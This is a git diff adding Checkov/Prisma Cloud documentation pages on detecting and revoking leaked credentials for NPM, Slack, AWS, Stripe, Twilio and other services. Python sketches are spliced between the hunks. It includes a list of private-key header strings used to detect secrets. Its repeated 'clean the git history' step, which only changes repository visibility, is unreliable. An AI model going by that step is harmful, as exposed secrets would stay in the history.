+An activated API key can be deactivated from the Mailchimp dashboard under the Extras/API Key tab.
+
+. Go to https://us1.admin.mailchimp.com/account/api/ to open the API Keys section of your account.
+
+. Find the API key you want to disable, toggle the slider in the Status column for that key, and click Disable.
+
+. In the pop-up modal, click Disable.
+
+. Clean the git history.
++
+Go under the settings section of your GitHub project and choose the change visibility button at the bottom.
+
+. Check the API call logs in the Mailchimp dashboard to ensure the key was not utilized during the compromised period.
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-12.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-12.adoc
new file mode 100644
index 000000000..78bd8204e
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-12.adoc
@@ -0,0 +1,65 @@
+== NPM Token
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 46bfa5d5-df04-4390-85ce-f312d62677f4
+
+|Checkov Check ID
+|CKV_SECRET_12
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+The npm access token can be used to authenticate to npm when using the API or the npm command-line interface (CLI).
+An access token is a hexadecimal string that you can use to authenticate, and which gives you the right to install and/or publish your modules.
+
+=== Fix - Buildtime
+
+
+*NPM*
+
+
+
+. Revoke the secret.
+
+. To see a list of your tokens, on the command line, run:
+
+----
+npm token list
+----
+
+. In the tokens table, find and copy the ID of the token you want to delete.
+On the command line, run the following command, replacing 123456 with the ID of the token you want to delete (npm reports `Removed 1 token`):
+
+----
+npm token delete 123456
+----
+
+. To confirm that the token has been removed, run:
+
+----
+npm token list
+----
+
+. Clean the git history.
+Go under the settings section of your GitHub project and choose the change visibility button at the bottom.
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-13.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-13.adoc
new file mode 100644
index 000000000..ea7845dea
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-13.adoc
@@ -0,0 +1,56 @@
+== Private Key
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| f9c21f44-a326-4f6d-8984-d2a8cffbd0bd
+
+|Checkov Check ID
+|CKV_SECRET_13
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+This check detects private keys by determining whether commonly used key attributes are present in the analyzed string:
+
+----
+DSA PRIVATE KEY
+EC PRIVATE KEY
+OPENSSH PRIVATE KEY
+PGP PRIVATE KEY BLOCK
+PRIVATE KEY
+RSA PRIVATE KEY
+SSH2 ENCRYPTED PRIVATE KEY
+PuTTY-User-Key-File-2
+----
+
+=== Fix - Buildtime
+
+
+*Multiple Services*
+
+
+
+. Revoke the exposed secret.
+
+. Clean the git history.
++
+Go under the settings section of your GitHub project and choose the change visibility button at the bottom.
+
+. Inspect your application's access logs to ensure the key was not utilized during the compromised period.
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-14.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-14.adoc
new file mode 100644
index 000000000..1f70dbfe7
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-14.adoc
@@ -0,0 +1,52 @@
+== Slack Token
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| bdbbce4e-76c0-47f5-9000-909b259281eb
+
+|Checkov Check ID
+|CKV_SECRET_14
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+Slack API tokens can be created for both members and bot users.
+For added security, it is recommended to rotate these tokens periodically.
+Slack will automatically revoke old tokens if they remain unused for long periods of time.
+
+=== Fix - Buildtime
+
+
+*Slack*
+
+
+
+. Revoke the exposed secret.
++
+Go to http://api.slack.com/methods/auth.revoke/test[auth.revoke] to revoke your token.
++
+Method URL: https://slack.com/api/auth.revoke. Preferred HTTP method: GET. Accepted content types: application/x-www-form-urlencoded.
+
+. Clean the git history.
++
+Go under the settings section of your GitHub project and choose the change visibility button at the bottom.
+
+. Inspect Slack's Events API log to ensure the key was not utilized during the compromised period.
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-15.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-15.adoc
new file mode 100644
index 000000000..914aff111
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-15.adoc
@@ -0,0 +1,46 @@
+== SoftLayer Credentials
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 66c63576-47c9-4ea7-9886-afc728739003
+
+|Checkov Check ID
+|CKV_SECRET_15
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+SoftLayer Technologies, Inc. (now IBM Cloud) was a dedicated server, managed hosting, and cloud computing provider, founded in 2005 and acquired by IBM in 2013.
+SoftLayer initially specialized in hosting workloads for gaming companies and startups, but shifted focus to enterprise workloads after its acquisition.
+
+=== Fix - Buildtime
+
+
+*IBM Cloud*
+
+
+
+. Revoke the exposed secret.
+
+. Clean the git history.
+
+. Inspect IBM Cloud logs to ensure the key was not utilized during the compromised period.
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-16.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-16.adoc
new file mode 100644
index 000000000..52d6be313
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-16.adoc
@@ -0,0 +1,58 @@
+== Square OAuth Secret
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| f32d4d2f-c3b4-4adb-93c4-48515d796758
+
+|Checkov Check ID
+|CKV_SECRET_16
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+The Square OAuth API uses the OAuth 2 protocol to get permission from the owner of the seller account to manage specific types of resources in that account.
+
+=== Fix - Buildtime
+
+
+*Square*
+
+
+
+. Revoke the exposed secret.
++
+`POST /oauth2/revoke`: Revokes an access token generated with the OAuth flow.
++
+If an account has more than one OAuth access token for your application, this endpoint revokes all of them, regardless of which token you specify.
++
+When an OAuth access token is revoked, all of the active subscriptions associated with that OAuth token are canceled immediately.
++
+Replace APPLICATION_SECRET with the application secret on the OAuth page in the developer dashboard.
++
+
+[source,text]
+----
+Authorization: Client APPLICATION_SECRET
+----
+
+. Clean the git history.
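The revocation call described above can be assembled with nothing but the standard library. The sketch below builds (but deliberately does not send) the HTTP request; the `connect.squareup.com` endpoint host and the JSON field names are assumptions taken from Square's description above and should be verified against current Square documentation:

```python
import json
from urllib import request

# Endpoint per Square's OAuth revoke description; verify before relying on it.
REVOKE_URL = "https://connect.squareup.com/oauth2/revoke"

def build_revoke_request(application_secret: str, client_id: str, token: str) -> request.Request:
    """Prepare (but do not send) the POST that revokes the client's tokens."""
    body = json.dumps({"client_id": client_id, "access_token": token}).encode()
    return request.Request(
        REVOKE_URL,
        data=body,
        headers={
            # Note the non-standard "Client" scheme carrying the application secret
            "Authorization": f"Client {application_secret}",
            "Content-Type": "application/json",
        },
        method="POST",
    )

req = build_revoke_request("APPLICATION_SECRET", "YOUR_APP_ID", "ACCESS_TOKEN")
print(req.get_method(), req.full_url)  # POST https://connect.squareup.com/oauth2/revoke
# urllib.request.urlopen(req) would actually send it; omitted here deliberately.
```

Sending the request with a valid application secret revokes every token issued to that client, per the behavior described above.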
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-17.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-17.adoc
new file mode 100644
index 000000000..7eb97b530
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-17.adoc
@@ -0,0 +1,51 @@
+== Stripe Access Key
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 53b697f8-bac9-4c27-8d37-ca29e62f7af5
+
+|Checkov Check ID
+|CKV_SECRET_17
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+Stripe authenticates your API requests using your account's API keys.
+If you do not include your key when making an API request, or use one that is incorrect or outdated, Stripe returns an error.
+Secret API keys should be kept confidential and only stored on your own servers.
+Your account's secret API key can perform any API request to Stripe without restriction.
+
+=== Fix - Buildtime
+
+
+*Stripe*
+
+
+
+. Revoke the exposed secret.
++
+Users with Administrator permissions can access a Stripe account's API keys by navigating to the Developers section of the Stripe dashboard and clicking on API Keys.
++
+If you no longer need a restricted key (or you suspect it has been compromised), you can revoke it at any time.
++
+You can also edit the key to change its level of access.
+
+. Clean the git history.
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-18.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-18.adoc
new file mode 100644
index 000000000..952a69341
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-18.adoc
@@ -0,0 +1,60 @@
+== Twilio Access Key
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| b72b7eaf-c8b9-4711-a646-6bb6aca7f922
+
+|Checkov Check ID
+|CKV_SECRET_18
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+Twilio Access Tokens are short-lived tokens that you can use to authenticate Twilio Client SDKs like Voice, Conversations, Sync, and Video.
+You create them on your server to verify a client's identity and grant access to client API features.
+All tokens have a limited lifetime, configurable up to 24 hours.
+However, a best practice is to generate Access Tokens for the shortest amount of time feasible for your application.
+
+=== Fix - Buildtime
+
+
+*Twilio*
+
+
+
+. Revoke the exposed secret.
++
+The following method deletes an API Key.
++
+This revokes its authorization to authenticate to the REST API and invalidates all Access Tokens generated using its secret.
++
+If the delete is successful, Twilio will return an HTTP 204 response with no body.
++
+
+[source,text]
+----
+DELETE https://api.twilio.com/2010-04-01/Accounts/{AccountSid}/Keys/{Sid}.json
+----
+
+
+. Clean the git history.
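The DELETE call above is an ordinary REST request authenticated with HTTP basic auth (account SID as the username, auth token as the password). A standard-library Python sketch that builds the request without sending it; the SIDs shown are placeholders:

```python
from base64 import b64encode
from urllib import request

def build_key_delete_request(account_sid: str, key_sid: str, auth_token: str) -> request.Request:
    """Prepare (but do not send) the DELETE that revokes a Twilio API Key."""
    url = f"https://api.twilio.com/2010-04-01/Accounts/{account_sid}/Keys/{key_sid}.json"
    # Twilio's REST API expects basic auth credentials of AccountSid:AuthToken
    credentials = b64encode(f"{account_sid}:{auth_token}".encode()).decode()
    return request.Request(
        url,
        headers={"Authorization": f"Basic {credentials}"},
        method="DELETE",
    )

req = build_key_delete_request("ACXXXXXXXXXXXXXXXX", "SKXXXXXXXXXXXXXXXX", "your_auth_token")
print(req.get_method(), req.full_url)
```

Passing the prepared request to `urllib.request.urlopen` would perform the revocation; a successful delete returns HTTP 204, as noted above.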
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-19.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-19.adoc
new file mode 100644
index 000000000..d435e1e64
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-19.adoc
@@ -0,0 +1,52 @@
+== Hex High Entropy String
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| a9c6ddac-78da-4928-a3e7-8662bb33f2c5
+
+|Checkov Check ID
+|CKV_SECRET_19
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+Password entropy is a numerical score for how unpredictable a password is, that is, how likely a string is to consist of highly random data.
+The policy calculates entropy levels using a Shannon entropy calculator.
+Entropy levels matter because the more information is required to determine an unknown key, the more difficult that key is to crack.
+If a high-entropy string is detected, the string is printed to the screen.
+This check scans the branch and evaluates the entropy of every blob of text against the hexadecimal character set.
+
+=== Fix - Buildtime
+
+
+*Multiple Services*
+
+
+
+. Revoke the exposed secret.
++
+Start by understanding what services were impacted and refer to the corresponding API documentation to learn how to revoke and rotate the secret.
+
+. Clean the git history.
++
+Go under the settings section of your GitHub project and choose the change visibility button at the bottom.
+
+. Check any relevant access logs to ensure the key was not utilized during the compromised period.
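The Shannon entropy scoring described above can be sketched in a few lines of Python. This is an illustrative approximation, not Checkov's exact implementation, and the hexadecimal character set and the idea of a detection threshold are assumptions for the sketch:

```python
import math
from collections import Counter

HEX_CHARS = "0123456789abcdefABCDEF"

def shannon_entropy(data: str, charset: str = HEX_CHARS) -> float:
    """Score a string's unpredictability in bits per character."""
    filtered = [ch for ch in data if ch in charset]
    if not filtered:
        return 0.0
    total = len(filtered)
    counts = Counter(filtered)
    # Shannon formula: -sum(p * log2(p)) over observed character frequencies
    entropy = -sum((n / total) * math.log2(n / total) for n in counts.values())
    return entropy if entropy > 0 else 0.0

# A repeated character scores 0; a string using all 16 hex digits equally scores 4
print(shannon_entropy("aaaaaaaaaaaaaaaa"))  # 0.0
print(shannon_entropy("0123456789abcdef"))  # 4.0
```

A scanner flags strings whose score exceeds some cutoff: a genuine hex API key approaches the 4-bit maximum, while ordinary identifiers and repeated patterns score much lower.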
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-2.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-2.adoc
new file mode 100644
index 000000000..52c2a3d5d
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-2.adoc
@@ -0,0 +1,62 @@
+== AWS Access Keys
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| a98f67ca-d303-4bd5-b31b-88ef2d894b2f
+
+|Checkov Check ID
+|CKV_SECRET_2
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+AWS Access Keys are long-term credentials for an IAM user or the AWS account root user.
+You can use access keys to sign programmatic requests to the AWS CLI or AWS API (directly or using the AWS SDK).
+Access keys consist of two parts: an access key ID (for example, `AKIAIOSFODNN7EXAMPLE`) and a secret access key (for example, `wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY`).
+
+=== Fix - Buildtime
+
+
+*AWS*
+
+
+
+. Revoke the exposed secret.
+
+. Sign in to the AWS Identity and Access Management (IAM) console as the root user.
+
+. Choose your account name on the navigation bar, and then choose My Security Credentials.
+
+. If you see a warning about accessing the security credentials, choose Continue to security credentials.
+
+. Expand the Access keys (access key ID and secret access key) section.
+
+. Choose Delete next to the access key that you want to delete.
++
+In the confirmation box, choose Yes.
+
+. Clean the git history.
++
+Go under the settings section of your GitHub project and choose the change visibility button at the bottom.
+
+. Inspect AWS CloudTrail access logs to ensure the key was not utilized during the compromised period.
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-21.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-21.adoc
new file mode 100644
index 000000000..10b183f35
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-21.adoc
@@ -0,0 +1,45 @@
+== Airtable API Key
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 8058279d-25be-4115-bd84-6b830faa3c5d
+
+|Checkov Check ID
+|CKV_SECRET_21
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+Airtable is a spreadsheet-database hybrid, with the features of a database but applied to a spreadsheet.
+The fields in an Airtable table are similar to cells in a spreadsheet, but have types such as 'checkbox', 'phone number', and 'drop-down list', and can reference file attachments like images.
+Users can create a database, set up column types, add records, link tables to one another, collaborate, sort records and publish views to external websites.
+The Airtable API key allows users to use the public API to create, fetch, update, and delete records in the bases they have access to in Airtable.
+API keys follow the same permissions that an account has in the Airtable UI.
+
+=== Fix - Buildtime
+
+
+*Airtable*
+
+If you accidentally reveal your API key, you should regenerate it as soon as possible at https://airtable.com/account.
+
+To delete your key, click the Delete key option.
+This will bring up a warning that deleting your key will break your API integrations.
+Click the red Yes, delete key button to confirm your key deletion.
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-22.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-22.adoc
new file mode 100644
index 000000000..71e64d54c
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-22.adoc
@@ -0,0 +1,46 @@
+== Algolia Key
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 1ea47a16-0199-4117-93f9-01de3fcdd814
+
+|Checkov Check ID
+|CKV_SECRET_22
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+Algolia is a proprietary search engine offering, usable through the software as a service (SaaS) model.
+API keys are necessary to work with Algolia.
+They give you code-level access to your account, data, and index settings.
+Whether you're sending or updating your data, searching your index, or doing anything else with Algolia's API, you need to use a valid API key.
+
+=== Fix - Buildtime
+
+
+*Algolia*
+
+Revoking an API key makes it unusable.
+It's crucial to revoke any compromised key, for example, a leaked write API key or a search API key that is being abused.
+However, keep in mind that you need to update your applications to avoid breaking them when the key they use becomes invalid.
+You can revoke an API key by deleting it from the dashboard, or through the API, with the deleteApiKey method.
+When deleting a main API key, you're also deleting all derived Secured API keys.
+You can never restore Secured API keys, even if you later restore the main key.
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-23.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-23.adoc
new file mode 100644
index 000000000..36fe164b9
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-23.adoc
@@ -0,0 +1,80 @@
+== Alibaba Cloud Keys
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 34a51c97-a8be-444b-816b-06ff2c99b462
+
+|Checkov Check ID
+|CKV_SECRET_23
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+Alibaba Cloud Key Management Service (KMS) provides secure and compliant key management and cryptography services to help you encrypt and protect sensitive data assets.
+KMS is integrated with a wide range of Alibaba Cloud services to allow you to encrypt data across the cloud and to control its distributed environment.
+KMS provides key usage logs via ActionTrail, supports custom key rotation, and provides HSMs that have passed FIPS 140-2 Level 3 or other relevant validation, to help you meet your regulatory and compliance needs.
+
+=== Fix - Buildtime
+
+
+*Alibaba*
+
+
+
+
+*Fix - Delete*
+
+
+
+. Log on to the RAM console by using your Alibaba Cloud account.
+
+. In the left-side navigation pane, choose Identities > Users.
+
+. On the Users page, click the username of a specific RAM user.
+
+. In the User AccessKeys section of the page that appears, find the specific AccessKey pair and click Delete in the Actions column.
+
+. Click OK.
+
+
+*Fix - Rotate*
+
+
+
+. Create an AccessKey pair for rotation.
+
+. Update all applications and systems to use the new AccessKey pair.
+
+. Disable the original AccessKey pair.
+
+. Confirm that your applications and systems are properly running.
++
+If the applications and systems are properly running, the update succeeds.
++
+You can delete the original AccessKey pair.
+
+. If an application or system stops running, you must enable the original AccessKey pair, and repeat Step 2 to Step 4 until the update succeeds.
+
+. Delete the original AccessKey pair.
++
+For more information, see Delete an AccessKey pair.
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-24.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-24.adoc
new file mode 100644
index 000000000..886d810fd
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-24.adoc
@@ -0,0 +1,48 @@
+== Asana Key
+
+Asana is a work management tool that helps teams manage projects and tasks in one place.
+Teams can create projects, assign work to teammates, specify deadlines, and communicate about tasks directly in Asana.
+It also includes reporting tools, file attachments, calendars, as well as setting and tracking company-wide goals.
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 250a1587-69ae-4878-8a7c-6c300eb9132f
+
+|Checkov Check ID
+|CKV_SECRET_24
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+A user can create many, but not unlimited, personal access tokens.
+When creating a token, you must give it a description to help you remember what you created the token for.
+Personal Access Tokens should be used similarly to OAuth access tokens when accessing the API, passing them in the Authorization header.
+You can generate a Personal Access Token from the Asana developer console.
+See the Authentication Quick Start for detailed instructions on getting started with PATs.
+
+=== Fix - Buildtime
+
+
+*Asana*
+
+An authorization token can be deauthorized or invalidated by making a request to Asana's API.
+Your app should make a POST request to https://app.asana.com/-/oauth_revoke, passing the parameters as part of a standard form-encoded post body.
+The body should include a valid refresh token, which will cause the refresh token and any associated bearer tokens to be deauthorized.
+Bearer tokens are not accepted in the request body since a new bearer token can always be obtained by reusing an authorized refresh token.
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-25.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-25.adoc
new file mode 100644
index 000000000..6e84526a9
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-25.adoc
@@ -0,0 +1,48 @@
+== Atlassian OAuth2 Keys
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 550b4cdd-b107-4bd7-8397-a38b8e32f713
+
+|Checkov Check ID
+|CKV_SECRET_25
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+OAuth is an authorization protocol that contains an authentication step.
+OAuth allows a user (resource owner) to grant a third-party application (consumer/client) access to their information on another site (resource).
+This process is commonly known as the OAuth dance.
+Jira uses 3-legged OAuth (3LO), which means that the user is involved by authorizing access to their data on the resource (as opposed to 2-legged OAuth, where the user is not involved).
+In Jira, a client is authenticated as the user involved in the OAuth dance and is authorized to have read and write access as that user.
+The data that can be retrieved and changed by the client is controlled by the user's permissions in Jira.
+The authorization process works by getting the resource owner to grant access to their information on the resource by authorizing a request token.
+This request token is used by the consumer to obtain an access token from the resource.
+Once the client has an access token, it can use the access token to make authenticated requests to the resource until the token expires or is revoked.
+
+=== Fix - Buildtime
+
+
+*Atlassian Services*
+
+You can only delete an app if it's not installed anywhere.
+If your app is currently installed on a site, uninstall it.
+Select Settings in the left menu, and select Delete app.
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-26.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-26.adoc
new file mode 100644
index 000000000..627922a80
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-26.adoc
@@ -0,0 +1,40 @@
+== Auth0 Keys
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 8ebec33d-9b5e-4a9d-8796-0da742b67bef
+
+|Checkov Check ID
+|CKV_SECRET_26
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+All Auth0-issued JWTs have JSON Web Signatures (JWSs), meaning they are signed rather than encrypted.
+A JWS represents content secured with digital signatures or Message Authentication Codes (MACs) using JSON-based data structures.
+
+=== Fix - Buildtime
+
+
+*Auth0*
+
+Once issued, access tokens and ID tokens cannot be revoked in the same way as cookies with session IDs for server-side sessions.
+As a result, tokens should be issued for relatively short periods, and then refreshed periodically if the user remains active.
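Because a JWS is signed but not encrypted, anyone who obtains a leaked token can read its header and claims without any key, which is why an exposed token must be treated as compromised. A standard-library Python sketch, using a throwaway demo token rather than a real Auth0-issued one, that splits a compact JWS into its three segments and decodes them:

```python
import base64
import json

def b64url_decode(segment: str) -> bytes:
    """Base64url-decode a JWT segment, restoring the stripped '=' padding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def inspect_jws(token: str) -> dict:
    """Return the (unverified!) header and payload of a compact JWS."""
    header_b64, payload_b64, signature_b64 = token.split(".")
    return {
        "header": json.loads(b64url_decode(header_b64)),
        "payload": json.loads(b64url_decode(payload_b64)),
        "signature_bytes": len(b64url_decode(signature_b64)),
    }

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

# Build a throwaway demo token; real tokens are issued and signed by Auth0.
demo = ".".join([
    b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode()),
    b64url(json.dumps({"sub": "user-123"}).encode()),
    b64url(b"\x00" * 32),  # fake 32-byte HMAC-SHA256 signature
])
print(inspect_jws(demo)["payload"])  # {'sub': 'user-123'}
```

Note that `inspect_jws` performs no signature verification; it only demonstrates that the contents are readable, which is the reason short token lifetimes matter.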
diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-27.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-27.adoc
new file mode 100644
index 000000000..029ad837b
--- /dev/null
+++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-27.adoc
@@ -0,0 +1,45 @@
+== Bitbucket Keys
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| afcada96-ce49-4e3a-b05a-c72da1b68083
+
+|Checkov Check ID
+|CKV_SECRET_27
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Git
+
+|===
+
+
+
+=== Description
+
+
+Bitbucket Cloud REST API integrations, and Atlassian Connect for Bitbucket add-ons, can use OAuth 2.0 to access resources in Bitbucket.
+For obtaining access/bearer tokens, Bitbucket supports three of RFC 6749's grant flows, plus a custom Bitbucket flow for exchanging JWT tokens for access tokens.
+Client ID: Stores the identifier that the authorization service uses to validate a login request.
+You generate this value in the authorization service when you configure the authorization settings for a web application and enter an authorized redirect URI.
+Client Secret: Stores the secret or password used to validate the client ID.
+You generate this value in the authorization service together with the client ID.
+
+=== Fix - Buildtime
+
+
+*Bitbucket*
+
+Access tokens expire in two hours.
+When this happens, you'll get 401 responses.
+Most access token grant responses therefore include a refresh token that can then be used to generate a new access token, without the need for end user participation. diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-28.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-28.adoc new file mode 100644 index 000000000..67b404cf9 --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-28.adoc @@ -0,0 +1,92 @@ +== Buildkite Agent Token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| b440bbd1-34e4-48dd-ae3d-89738d508ff3 + +|Checkov Check ID +|CKV_SECRET_28 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +The Buildkite Agent requires an agent token to connect to Buildkite and register for work. +If you are an admin of your Buildkite organization, you can view the tokens on your Agents page. +When you create a new organization in Buildkite, a default agent token is created. +This token can be used for testing and development, but it's recommended to create new, specific tokens for each new environment. + +=== Fix - Buildtime + + +*Buildkite Tokens can be revoked using the GraphQL API with the agentTokenRevoke mutation.* + + +You need to pass your agent token's ID in the mutation.
+You can get the token from your Buildkite dashboard, in Agents > Reveal Agent Token, or you can retrieve a list of agent token IDs using this query: + + +[source,graphql] +---- +query GetAgentTokenID { + organization(slug: "organization-slug") { + agentTokens(first: 50) { + edges { + node { + id + uuid + description + } + } + } + } +} +---- + +Then, using the token ID, revoke the agent token: + + +[source,graphql] +---- +mutation { + agentTokenRevoke(input: { + id: "token-id", + reason: "A reason" + }) { + agentToken { + description + revokedAt + revokedReason + } + } +} +---- diff --git a/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-29.adoc b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-29.adoc new file mode 100644 index 000000000..fba731f5a --- /dev/null +++ b/code-security/policy-reference/secrets-policies/secrets-policy-index/git-secrets-29.adoc @@ -0,0 +1,65 @@ +== CircleCI Personal Token + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 10fac584-5171-4acb-8fcf-818c48e93cd5 + +|Checkov Check ID +|CKV_SECRET_29 + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Git + +|=== + + + +=== Description + + +To use the CircleCI API or view details about your pipelines, you will need API tokens with the appropriate permissions. +This document describes the types of API tokens available, as well as how to create and delete them. +There are two types of API tokens you can create within CircleCI. +Personal: These tokens are used to interact with the CircleCI API and grant full read and write permissions. +Project: These tokens allow you to read/write information for specific projects. +Project tokens have three scope options: Status, Read Only, and Admin. +- Status tokens grant read access to the project's build statuses, which is useful for embedding status badges.
